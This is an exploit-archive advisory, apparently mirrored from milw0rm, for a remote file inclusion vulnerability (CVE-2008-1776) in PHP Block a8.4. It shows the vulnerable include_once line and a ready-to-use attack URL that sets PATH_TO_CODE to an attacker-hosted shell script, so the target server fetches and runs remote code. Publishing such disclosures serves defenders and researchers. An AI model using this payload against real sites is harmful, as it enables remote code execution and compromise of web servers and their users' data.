PhpBlock a8.4 - 'PATH_TO_CODE' Remote File Inclusion



EKU-ID: 13291 CVE: OSVDB-44382;CVE-2008-1776 OSVDB-ID:
Author: w0cker Published: 2008-04-02 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Script Name : PHP Block a8.4

Download : http://sourceforge.net/project/downloading.php?group_id=186381&use_mirror=surfnet&filename=a8.4.zip&73507325

Error : include_once $PATH_TO_CODE."/script/fonction.php";

Vul Code : http://[site]/[Path]/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=http://[ShellCode]

Greetz : Kezzap66345 - Str0ke - Dread 35

# milw0rm.com [2008-04-02]